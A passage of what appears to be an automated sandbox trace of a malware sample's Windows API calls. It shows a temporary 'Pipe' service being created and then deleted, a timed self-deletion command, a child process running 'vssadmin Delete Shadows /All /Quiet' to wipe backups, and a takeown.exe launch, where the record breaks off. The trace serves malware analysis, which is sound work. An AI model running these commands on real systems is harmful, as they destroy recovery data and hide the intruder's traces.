lpProcessInformation=0x18ff00*(hProcess=0x9c, hThread=0x98, dwProcessId=0x308, dwThreadId=0x640)) returned 1 [0063.836] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0xffffffff) returned 0x0 [0064.025] GetExitCodeProcess (in: hProcess=0x9c, lpExitCode=0x18ff30 | out: lpExitCode=0x18ff30*=0x0) returned 1 [0064.025] CloseHandle (hObject=0x98) returned 1 [0064.025] CloseHandle (hObject=0x9c) returned 1 [0064.025] lstrlenW (lpString="C:\\Windows\\system32\\Pipe.exe") returned 28 [0064.025] lstrlenW (lpString="") returned 0 [0064.025] lstrlenW (lpString="-s") returned 2 [0064.025] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x42) returned 0x27ba90 [0064.025] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x2) returned 0x27e0e8 [0064.028] CreateServiceW (in: hSCManager=0x27e0e8, lpServiceName="Pipe", lpDisplayName="Pipe", dwDesiredAccess=0xf01ff, dwServiceType=0x10, dwStartType=0x3, dwErrorControl=0x0, lpBinaryPathName="C:\\Windows\\system32\\Pipe.exe -s", lpLoadOrderGroup=0x0, lpdwTagId=0x0, lpDependencies=0x0, lpServiceStartName=0x0, lpPassword=0x0 | out: lpdwTagId=0x0) returned 0x27ad20 [0064.097] StartServiceW (hService=0x27ad20, dwNumServiceArgs=0x0, lpServiceArgVectors=0x0) returned 1 [0066.002] Sleep (dwMilliseconds=0x64) [0066.393] QueryServiceStatusEx (in: hService=0x27ad20, InfoLevel=0x0, lpBuffer=0x18fee8, cbBufSize=0x24, pcbBytesNeeded=0x18ff20 | out: lpBuffer=0x18fee8, pcbBytesNeeded=0x18ff20) returned 1 [0066.394] ControlService (in: hService=0x27ad20, dwControl=0x1, lpServiceStatus=0x18fee8 | out: lpServiceStatus=0x18fee8*(dwServiceType=0x10, dwCurrentState=0x4, dwControlsAccepted=0x5, dwWin32ExitCode=0x0, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 1 [0066.446] Sleep (dwMilliseconds=0x3e8) [0068.403] QueryServiceStatusEx (in: hService=0x27ad20, InfoLevel=0x0, lpBuffer=0x18fee8, cbBufSize=0x24, pcbBytesNeeded=0x18ff20 | out: lpBuffer=0x18fee8, pcbBytesNeeded=0x18ff20) returned 1 [0068.403] Sleep (dwMilliseconds=0x3e8) [0069.448] QueryServiceStatusEx (in: hService=0x27ad20, InfoLevel=0x0, lpBuffer=0x18fee8, cbBufSize=0x24, pcbBytesNeeded=0x18ff20 | out: lpBuffer=0x18fee8, pcbBytesNeeded=0x18ff20) returned 1 [0069.448] Sleep (dwMilliseconds=0x3e8) [0070.458] QueryServiceStatusEx (in: hService=0x27ad20, InfoLevel=0x0, lpBuffer=0x18fee8, cbBufSize=0x24, pcbBytesNeeded=0x18ff20 | out: lpBuffer=0x18fee8, pcbBytesNeeded=0x18ff20) returned 1 [0070.458] Sleep (dwMilliseconds=0x3e8) [0071.507] QueryServiceStatusEx (in: hService=0x27ad20, InfoLevel=0x0, lpBuffer=0x18fee8, cbBufSize=0x24, pcbBytesNeeded=0x18ff20 | out: lpBuffer=0x18fee8, pcbBytesNeeded=0x18ff20) returned 1 [0071.507] Sleep (dwMilliseconds=0x3e8) [0072.609] QueryServiceStatusEx (in: hService=0x27ad20, InfoLevel=0x0, lpBuffer=0x18fee8, cbBufSize=0x24, pcbBytesNeeded=0x18ff20 | out: lpBuffer=0x18fee8, pcbBytesNeeded=0x18ff20) returned 1 [0072.609] Sleep (dwMilliseconds=0x3e8) [0073.682] QueryServiceStatusEx (in: hService=0x27ad20, InfoLevel=0x0, lpBuffer=0x18fee8, cbBufSize=0x24, pcbBytesNeeded=0x18ff20 | out: lpBuffer=0x18fee8, pcbBytesNeeded=0x18ff20) returned 1 [0073.683] Sleep (dwMilliseconds=0x3e8) [0074.773] QueryServiceStatusEx (in: hService=0x27ad20, InfoLevel=0x0, lpBuffer=0x18fee8, cbBufSize=0x24, pcbBytesNeeded=0x18ff20 | out: lpBuffer=0x18fee8, pcbBytesNeeded=0x18ff20) returned 1 [0074.774] Sleep (dwMilliseconds=0x3e8) [0076.567] QueryServiceStatusEx (in: hService=0x27ad20, InfoLevel=0x0, lpBuffer=0x18fee8, cbBufSize=0x24, pcbBytesNeeded=0x18ff20 | out: lpBuffer=0x18fee8, pcbBytesNeeded=0x18ff20) returned 1 [0076.568] Sleep (dwMilliseconds=0x3e8) [0077.597] QueryServiceStatusEx (in: hService=0x27ad20, InfoLevel=0x0, lpBuffer=0x18fee8, cbBufSize=0x24, pcbBytesNeeded=0x18ff20 | out: lpBuffer=0x18fee8, pcbBytesNeeded=0x18ff20) returned 1 [0077.597] Sleep (dwMilliseconds=0x3e8) [0078.612] QueryServiceStatusEx (in: hService=0x27ad20, InfoLevel=0x0, lpBuffer=0x18fee8, cbBufSize=0x24, pcbBytesNeeded=0x18ff20 | out: lpBuffer=0x18fee8, pcbBytesNeeded=0x18ff20) returned 1 [0078.613] Sleep (dwMilliseconds=0x3e8) [0079.627] QueryServiceStatusEx (in: hService=0x27ad20, InfoLevel=0x0, lpBuffer=0x18fee8, cbBufSize=0x24, pcbBytesNeeded=0x18ff20 | out: lpBuffer=0x18fee8, pcbBytesNeeded=0x18ff20) returned 1 [0079.627] Sleep (dwMilliseconds=0x3e8) [0080.640] QueryServiceStatusEx (in: hService=0x27ad20, InfoLevel=0x0, lpBuffer=0x18fee8, cbBufSize=0x24, pcbBytesNeeded=0x18ff20 | out: lpBuffer=0x18fee8, pcbBytesNeeded=0x18ff20) returned 1 [0080.641] Sleep (dwMilliseconds=0x3e8) [0081.686] QueryServiceStatusEx (in: hService=0x27ad20, InfoLevel=0x0, lpBuffer=0x18fee8, cbBufSize=0x24, pcbBytesNeeded=0x18ff20 | out: lpBuffer=0x18fee8, pcbBytesNeeded=0x18ff20) returned 1 [0081.687] Sleep (dwMilliseconds=0x3e8) [0083.560] QueryServiceStatusEx (in: hService=0x27ad20, InfoLevel=0x0, lpBuffer=0x18fee8, cbBufSize=0x24, pcbBytesNeeded=0x18ff20 | out: lpBuffer=0x18fee8, pcbBytesNeeded=0x18ff20) returned 1 [0083.560] DeleteService (hService=0x27ad20) returned 1 [0083.561] DeleteService (hService=0x27ad20) returned 0 [0083.561] CloseServiceHandle (hSCObject=0x27ad20) returned 1 [0083.563] CloseServiceHandle (hSCObject=0x27e0e8) returned 1 [0083.688] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27b058 | out: hHeap=0x260000) returned 1 [0083.688] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a9b0 | out: hHeap=0x260000) returned 1 [0083.688] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27ae30 | out: hHeap=0x260000) returned 1 [0083.688] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x279b60 | out: hHeap=0x260000) returned 1 [0083.688] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x279bc0 | out: hHeap=0x260000) returned 1 [0083.688] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x279dc8 | out: hHeap=0x260000) returned 1 [0083.688] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x279e68 | out: hHeap=0x260000) returned 1 [0083.688] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x279f28 | out: hHeap=0x260000) returned 1 [0083.688] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x279fe8 | out: hHeap=0x260000) returned 1 [0083.688] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x279510 | out: hHeap=0x260000) returned 1 [0083.688] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x279530 | out: hHeap=0x260000) returned 1 [0083.688] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x279ba0 | out: hHeap=0x260000) returned 1 [0083.688] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x279c10 | out: hHeap=0x260000) returned 1 [0083.688] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x279d08 | out: hHeap=0x260000) returned 1 [0083.689] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x279da8 | out: hHeap=0x260000) returned 1 [0083.689] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x279de8 | out: hHeap=0x260000) returned 1 [0083.689] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x279e28 | out: hHeap=0x260000) returned 1 [0083.689] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x279ec8 | out: hHeap=0x260000) returned 1 [0083.689] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x279ee8 | out: hHeap=0x260000) returned 1 [0083.689] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x279f68 | out: hHeap=0x260000) returned 1 [0083.689] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x279fa8 | out: hHeap=0x260000) returned 1 [0083.689] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x279fc8 | out: hHeap=0x260000) returned 1 [0083.689] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a108 | out: hHeap=0x260000) returned 1 [0083.689] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a1a8 | out: hHeap=0x260000) returned 1 [0083.689] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a1e8 | out: hHeap=0x260000) returned 1 [0083.689] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a208 | out: hHeap=0x260000) returned 1 [0083.689] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a228 | out: hHeap=0x260000) returned 1 [0083.689] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x2794f0 | out: hHeap=0x260000) returned 1 [0083.689] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x279c30 | out: hHeap=0x260000) returned 1 [0083.689] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x279d28 | out: hHeap=0x260000) returned 1 [0083.689] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x279d88 | out: hHeap=0x260000) returned 1 [0083.689] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x279f08 | out: hHeap=0x260000) returned 1 [0083.689] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x279f88 | out: hHeap=0x260000) returned 1 [0083.689] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a048 | out: hHeap=0x260000) returned 1 [0083.689] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a068 | out: hHeap=0x260000) returned 1 [0083.689] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a088 | out: hHeap=0x260000) returned 1 [0083.689] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a0a8 | out: hHeap=0x260000) returned 1 [0083.689] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a0c8 | out: hHeap=0x260000) returned 1 [0083.689] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a0e8 | out: hHeap=0x260000) returned 1 [0083.689] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a168 | out: hHeap=0x260000) returned 1 [0083.689] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a188 | out: hHeap=0x260000) returned 1 [0083.689] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x279b80 | out: hHeap=0x260000) returned 1 [0083.689] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x279c50 | out: hHeap=0x260000) returned 1 [0083.689] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x279c70 | out: hHeap=0x260000) returned 1 [0083.689] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x279d48 | out: hHeap=0x260000) returned 1 [0083.689] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x279d68 | out: hHeap=0x260000) returned 1 [0083.689] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x279e08 | out: hHeap=0x260000) returned 1 [0083.689] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x279e48 | out: hHeap=0x260000) returned 1 [0083.689] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x279e88 | out: hHeap=0x260000) returned 1 [0083.689] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x279ea8 | out: hHeap=0x260000) returned 1 [0083.689] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x279f48 | out: hHeap=0x260000) returned 1 [0083.689] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a008 | out: hHeap=0x260000) returned 1 [0083.689] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a028 | out: hHeap=0x260000) returned 1 [0083.689] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a128 | out: hHeap=0x260000) returned 1 [0083.690] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a148 | out: hHeap=0x260000) returned 1 [0083.691] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a1c8 | out: hHeap=0x260000) returned 1 [0083.691] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x274180 | out: hHeap=0x260000) returned 1 [0083.691] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x2741d0 | out: hHeap=0x260000) returned 1 [0083.691] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x274338 | out: hHeap=0x260000) returned 1 [0083.691] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x274360 | out: hHeap=0x260000) returned 1 [0083.691] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x274450 | out: hHeap=0x260000) returned 1 [0083.691] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x2744c8 | out: hHeap=0x260000) returned 1 [0083.691] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x2744f0 | out: hHeap=0x260000) returned 1 [0083.691] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a690 | out: hHeap=0x260000) returned 1 [0083.691] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a6b8 | out: hHeap=0x260000) returned 1 [0083.691] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a820 | out: hHeap=0x260000) returned 1 [0083.691] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a870 | out: hHeap=0x260000) returned 1 [0083.691] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x2741a8 | out: hHeap=0x260000) returned 1 [0083.691] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x2741f8 | out: hHeap=0x260000) returned 1 [0083.691] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x274248 | out: hHeap=0x260000) returned 1 [0083.691] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x274270 | out: hHeap=0x260000) returned 1 [0083.691] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x2742e8 | out: hHeap=0x260000) returned 1 [0083.691] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x2743d8 | out: hHeap=0x260000) returned 1 [0083.691] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x274478 | out: hHeap=0x260000) returned 1 [0083.692] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a5c8 | out: hHeap=0x260000) returned 1 [0083.692] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a640 | out: hHeap=0x260000) returned 1 [0083.692] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a668 | out: hHeap=0x260000) returned 1 [0083.692] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a6e0 | out: hHeap=0x260000) returned 1 [0083.692] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a758 | out: hHeap=0x260000) returned 1 [0083.692] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a780 | out: hHeap=0x260000) returned 1 [0083.692] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a7a8 | out: hHeap=0x260000) returned 1 [0083.692] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a7d0 | out: hHeap=0x260000) returned 1 [0083.692] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a8c0 | out: hHeap=0x260000) returned 1 [0083.692] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a8e8 | out: hHeap=0x260000) returned 1 [0083.692] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a910 | out: hHeap=0x260000) returned 1 [0083.692] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x274158 | out: hHeap=0x260000) returned 1 [0083.692] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x274220 | out: hHeap=0x260000) returned 1 [0083.692] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x274298 | out: hHeap=0x260000) returned 1 [0083.692] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x2742c0 | out: hHeap=0x260000) returned 1 [0083.692] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x2743b0 | out: hHeap=0x260000) returned 1 [0083.692] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x274400 | out: hHeap=0x260000) returned 1 [0083.692] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x274428 | out: hHeap=0x260000) returned 1 [0083.692] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a5f0 | out: hHeap=0x260000) returned 1 [0083.692] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a618 | out: hHeap=0x260000) returned 1 [0083.692] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a708 | out: hHeap=0x260000) returned 1 [0083.692] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a848 | out: hHeap=0x260000) returned 1 [0083.692] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a898 | out: hHeap=0x260000) returned 1 [0083.692] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a938 | out: hHeap=0x260000) returned 1 [0083.692] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a960 | out: hHeap=0x260000) returned 1 [0083.692] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x274310 | out: hHeap=0x260000) returned 1 [0083.692] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x274388 | out: hHeap=0x260000) returned 1 [0083.692] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x2744a0 | out: hHeap=0x260000) returned 1 [0083.692] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a730 | out: hHeap=0x260000) returned 1 [0083.692] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a7f8 | out: hHeap=0x260000) returned 1 [0083.692] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a988 | out: hHeap=0x260000) returned 1 [0083.692] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x279be0 | out: hHeap=0x260000) returned 1 [0083.692] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a520 | out: hHeap=0x260000) returned 1 [0083.692] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a550 | out: hHeap=0x260000) returned 1 [0083.692] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a580 | out: hHeap=0x260000) returned 1 [0083.693] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27adb0 | out: hHeap=0x260000) returned 1 [0083.693] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27ade0 | out: hHeap=0x260000) returned 1 [0083.693] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x279cc0 | out: hHeap=0x260000) returned 1 [0083.693] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a4f0 | out: hHeap=0x260000) returned 1 [0083.693] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x279c90 | out: hHeap=0x260000) returned 1 [0083.693] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Pipe:bin") returned 54 [0083.693] lstrcmpW (lpString1=":bin", lpString2=":bin") returned 0 [0083.693] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x132) returned 0x279b60 [0083.693] _snwprintf (in: _Dest=0x279b60, _Count=0x99, _Format="cmd /c choice /t %u /d y & attrib -h \"%s\" & del \"%s\"" | out: _Dest="cmd /c choice /t 10 /d y & attrib -h \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Pipe\" & del \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Pipe\"") returned 148 [0083.693] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="cmd /c choice /t 10 /d y & attrib -h \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Pipe\" & del \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Pipe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18fef8*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18ff3c | out: lpCommandLine="cmd /c choice /t 10 /d y & attrib -h \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Pipe\" & del \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Pipe\"", lpProcessInformation=0x18ff3c*(hProcess=0xe0, hThread=0xdc, dwProcessId=0xac8, dwThreadId=0x490)) returned 1 [0083.704] CloseHandle (hObject=0xdc) returned 1 [0083.704] CloseHandle (hObject=0xe0) returned 1 [0083.704] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x279b60 | out: hHeap=0x260000) returned 1 [0083.704] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x0) returned 0x1001af6 [0083.704] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0083.704] CloseHandle (hObject=0x94) returned 1 [0083.706] DeleteFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\Pipe.dmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\pipe.dmp")) returned 1 [0083.708] ExitProcess (uExitCode=0x0) Thread: id = 36 os_tid = 0xb0c Thread: id = 347 os_tid = 0x7ac Process: id = "3" image_name = "vssadmin.exe" filename = "c:\\windows\\system32\\vssadmin.exe" page_root = "0x4b1c4000" os_pid = "0x5c4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x6a8" cmd_line = "C:\\Windows\\system32\\vssadmin.exe Delete Shadows /All /Quiet" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 3 os_tid = 0xa4c Thread: id = 4 os_tid = 0x4fc Thread: id = 5 os_tid = 0x500 Thread: id = 6 os_tid = 0x31c Thread: id = 7 os_tid = 0x25c Process: id = "4" image_name = "vssvc.exe" filename = "c:\\windows\\system32\\vssvc.exe" page_root = "0x49729000" os_pid = "0x51c" os_integrity_level = "0x4000" os_privileges = "0xe60b7e890" monitor_reason = "rpc_server" parent_id = "3" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\vssvc.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\VSS" [0xe], "NT AUTHORITY\\Logon Session 00000000:00057a78" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 8 os_tid = 0x7ac Thread: id = 9 os_tid = 0x7a0 Thread: id = 10 os_tid = 0x540 Thread: id = 11 os_tid = 0x7dc [0031.951] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xcbd8c0 | out: lpSystemTimeAsFileTime=0xcbd8c0*(dwLowDateTime=0xb86bb9c0, dwHighDateTime=0x1d64ac6)) [0031.951] GetCurrentProcessId () returned 0x51c [0031.951] GetCurrentThreadId () returned 0x7dc [0031.951] GetTickCount () returned 0x11434b7 [0031.951] QueryPerformanceCounter (in: lpPerformanceCount=0xcbd8c8 | out: lpPerformanceCount=0xcbd8c8*=15260802379) returned 1 [0031.951] malloc (_Size=0x100) returned 0x628e80 Thread: id = 12 os_tid = 0xad4 Thread: id = 13 os_tid = 0x7e4 Thread: id = 14 os_tid = 0x518 Thread: id = 28 os_tid = 0xac8 Thread: id = 35 os_tid = 0xb10 Thread: id = 39 os_tid = 0x9cc Process: id = "5" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x972d000" os_pid = "0xc8" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "4" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000dde1" [0xc000000f], "LOCAL" [0x7] Thread: id = 15 os_tid = 0xa50 Thread: id = 16 os_tid = 0x768 Thread: id = 17 os_tid = 0x764 Thread: id = 18 os_tid = 0x758 Thread: id = 19 os_tid = 0x724 Thread: id = 20 os_tid = 0x718 Thread: id = 21 os_tid = 0x714 Thread: id = 22 os_tid = 0x630 Thread: id = 23 os_tid = 0x154 Thread: id = 24 os_tid = 0x150 Thread: id = 25 os_tid = 0x120 Thread: id = 26 os_tid = 0x118 Thread: id = 27 os_tid = 0xf0 Thread: id = 38 os_tid = 0x15c Thread: id = 367 os_tid = 0x8cc Thread: id = 368 os_tid = 0x888 Thread: id = 392 os_tid = 0x960 Thread: id = 434 os_tid = 0x6c0 Process: id = "6" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x4982e000" os_pid = "0x114" os_integrity_level = "0x4000" os_privileges = "0x60814080" monitor_reason = "rpc_server" parent_id = "4" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\System32\\svchost.exe -k swprv" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\swprv" [0xe], "NT AUTHORITY\\Logon Session 00000000:00057e63" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 29 os_tid = 0xb1c Thread: id = 30 os_tid = 0xacc Thread: id = 31 os_tid = 0xae4 Thread: id = 32 os_tid = 0xafc Thread: id = 33 os_tid = 0xaf8 Thread: id = 34 os_tid = 0x7c0 Thread: id = 40 os_tid = 0x9ec Process: id = "7" image_name = "takeown.exe" filename = 